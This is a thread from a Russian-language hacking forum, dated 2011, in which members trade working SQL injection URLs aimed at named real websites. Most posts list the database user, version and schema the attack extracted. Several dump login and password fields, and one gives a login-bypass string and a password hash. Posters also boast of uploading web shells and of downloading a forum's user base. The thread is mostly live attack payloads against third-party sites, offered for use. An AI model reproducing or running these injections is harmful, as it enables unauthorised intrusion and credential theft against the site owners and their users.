SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    http://www.credit-center.ru/news.php?id_news=-92+union+select+1,version(),3,4,5--+
    ==
    http://sibselmash.nsk.ru/news.php?id=150+and+1=0+union+select+1,database%28 %29,3,version%28%29,user%28%29,6,7--
    ==
    http://www.nordsy.spb.ru/sv2/news.php?id=103+order+by+7--+
     
    #13861 Osstudio, 17 May 2011
    Last edited: 17 May 2011
  2. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    717
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.batcon.org/index.php/all-about-bats/species-profiles.html?task=detail&species=-2160+union+select+1,2,3,4,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,6--&country=43&state=all&family=all&limitstart=0
    Username: beejbat_admin@10.10.10.136
    Version: 5.0.77-log
    Database: beejbat_vrc

    Google PR: 7

    http://www.batcon.org/administrator/
     
  3. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,294
    Likes Received:
    429
    Reputations:
    234
    ТИЦ130 PR7
    http://www.ircam.fr/media/scripts/calendrier/oai/oai2.php?verb=GetRecord&metadataPrefix=mods&identifier=oai:ircam.fr:programmation:281'+and+1=0+union+select+group_concat(concat_ws(0x3a3a,user,password)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+mysql.user+--+
     
  4. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Code:
    http://graffs.com.ua/index.php?page=products&shop=1&cat=19&scat=&sscat=64&id=-216+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=0x677261666673+--+
    version: 5.5.9-log
    database: graffs
    user: graffs@hosting2.colocall.net
     
  5. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    175
    Likes Received:
    250
    Reputations:
    27
    *Удаленно*
    http://fmspk.ru/press.php?id=-10+union+select+1,2,3,group_concat(0x0b,name,0x3a,pass),5,6+from+usrpsw+--
    File_Priv=no
    ТИЦ 60 PR 2
    Логиниться сразу на сайте, но там htpasswd :(
    Да, простите что выложу пасс и логин, но я не могу сделать иначе. На таком серьезном ресурсе..
    user:b89e5f6497323d36c7b00413d0ba15c6:писька
    [​IMG]


    Dr.Z3r0:
    кто еще раз вставит картинку в пост со взломанного ресурса, тот получит банан
     
    #13865 A_n_d_r_e_i, 20 May 2011
    Last edited by a moderator: 22 May 2011
    3 people like this.
  6. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    http://www.vs.com.ua/a-news/news.php?id=16+and+1=0+union+select+1,2,3,version%28%29,5,database%28%29,7,8,9,10--
     
  7. Lindows

    Lindows Member

    Joined:
    2 Nov 2009
    Messages:
    11
    Likes Received:
    11
    Reputations:
    7
    http://www.neilprydemaui.com/items.php?id=476+union+select+1,concat_ws%280x3b,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11--

    version: 5.1.41
    database: neilprydemaui_2
    user: neilprydemaui@localhost

    Кроме этой базы там есть еще пару, можно слить базу пользователей форуме. (слил =) )
     
  8. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Там их 13 :)
     
  9. Lindows

    Lindows Member

    Joined:
    2 Nov 2009
    Messages:
    11
    Likes Received:
    11
    Reputations:
    7
    http://www.basicjokes.com/djoke.php?id=-886+union+select+1,concat_ws%280x3b,user%28%29,version%28%29,database%28%29%29--

    version: 5.0.77
    database: basicjok_Jokes
    user: basicjok_jokes@localhost
     
    1 person likes this.
  10. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    http://www.srbm.ru/news.php?news_id=809+and+1=0+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
     
  11. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.unesco.org/archives/newsletters/cahiers/cahieritems.php?idArticle=15%20and%20row%281,1%29%3E%28select%20count%28*%29,concat%28version%28%29,0x3a,floor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29--
     
    1 person likes this.
  12. DIEZalok

    DIEZalok Banned

    Joined:
    22 Jan 2009
    Messages:
    14
    Likes Received:
    11
    Reputations:
    12
    Хороший кодинг :\\

    Code:
    http://sitemapnow.com/news.php?id=9' and !1 union select 1,mid(group_concat(concat_ws(0x3a, id, user, email, password)),1,1024),3,4,5,6,7 from sm_users-- -
    Code:
    http://sitemapnow.com/articles.php?id=10' and !1 union select 1,version(),3,4,5,6,7-- -
    В форме входа
    логин: ' or id=1-- -
    пасс: уф
     
    #13872 DIEZalok, 22 May 2011
    Last edited: 22 May 2011
  13. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    http://driverb.ru/news.php?id_news=55+and+1=0+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
    P.S Отображается в title :)
    А также там всего 8 БД, и это всё разные сайты, aaea.ru и т.д....уже на всех я залил шелл...
     
    #13873 Osstudio, 22 May 2011
    Last edited: 22 May 2011
  14. MetalKvantor

    MetalKvantor New Member

    Joined:
    12 Apr 2011
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    тИЦ:60

    Code:
    http://pingpong.su/info.php?sect_id&id=-1+union+select+all+1,2,group_concat(0x0b,login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+conf_users
     
  15. MetalKvantor

    MetalKvantor New Member

    Joined:
    12 Apr 2011
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://sibabitur.ru/src8_vuz_catalog2.php?id=-1+union+select+all+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12+from+information_schema.tables

    Дальше копаться не стал...
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    884
    Reputations:
    859
    pr 3 тиц 10
    jurabek@208.109.162.156:4.1.20:jurabek

    pr3 тиц 700
    sedmoy_user@localhost:4.1.22-standard-log:sedmoy_db

    pr5 тиц 425
    paraav01@fe114.hc.ru:5.1.54-log:wwwparaaviscom

    pr1 тиц 10
    alexgroupe_7@localhost:5.0.81-community:alexgroupe_7

    pr5 тиц 100
    web_mediacia_com@zvm13.host.ru:4.0.27-log:web_mediacia_com
     
    _________________________
    #13876 winstrool, 23 May 2011
    Last edited: 23 May 2011
    1 person likes this.
  17. Lindows

    Lindows Member

    Joined:
    2 Nov 2009
    Messages:
    11
    Likes Received:
    11
    Reputations:
    7
    Code:
    http://www.zabudova.by/index.php?module=view_news&nid=37+union+select+1,2,concat_ws%280x3b,user%28%29,database%28%29,version%28%29%29,4,5,6--
    
    http://www.svenskaspraket.org/pesni.php?id=-9+union+select+concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,2--
    
    http://www.at-sib.ru/internet.php?id=-9+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4,5--
    
    http://zoorinok.com.ua/details_topic.php?id=-9+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7--
    
    http://www.nugabestrostov.ru/article.php?id=-9+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11--
    
    
    
    
    
    
    
    
    
     
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    884
    Reputations:
    859
    pr 7 тиц 90
    Microsoft SQL Server 2008 (SP2) - 10.0.4000.0 (X64) Sep 16 2010 19:43:16 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2)
     
    _________________________
  19. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    Всякая левота:

    Code:
    http://www.waterfallsnorthwest.com/nws/waterfall.php?num=636-1+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),5,6,7,8,9-- 
    PR: 5
    Database Version: 5.0.91-log
    Database name: waterfa
    User name: sorefeet@cgi1204.int.bizland.net

    Code:
    http://www.simonlawpc.com/meettheattorneysdetail.php?id=1-100+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6-- 
    PR: 3
    Database Version: 4.1.22-log
    Database name: simonlaw
    User name: simonlawuser@localhost
     
    #13879 HellFire, 24 May 2011
    Last edited: 18 Jun 2011
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    884
    Reputations:
    859
    pr 3 тиц 10
    5.0.91-community:cocktail_bar:cocktail_bar@localhost

    5.0.51a-3ubuntu5.4:dicotaweb:dico45fg@localhost

    5.0.91-community-log:vik0azis_nsp:vik0azis_vikuzr@localhost

    pr 4
    5.0.45-COMMUNITY:QUMERAN:QUMERAN@192.168.1.117

    5.1.56-community-log:daytimer_haisun:daytimer_haisun@localhost

    pr 3 тиц 10
    5.0.90:pan_base:pan_base@localhost

    5.1.50-lk-log:eshokcomua:eshokcomua@localhost

    pr 2 тиц 10
    5.0.77-log:tornados_tornado:tornados_tornado@localhost

    pr 2
    5.0.26-log:avtogradom:avtogradom@localhost

    pr 2 тиц 30
    5.0.77-log:uzg:uzg@localhost
     
    _________________________
    #13880 winstrool, 24 May 2011
    Last edited: 24 May 2011
Loading...
Thread Status:
Not open for further replies.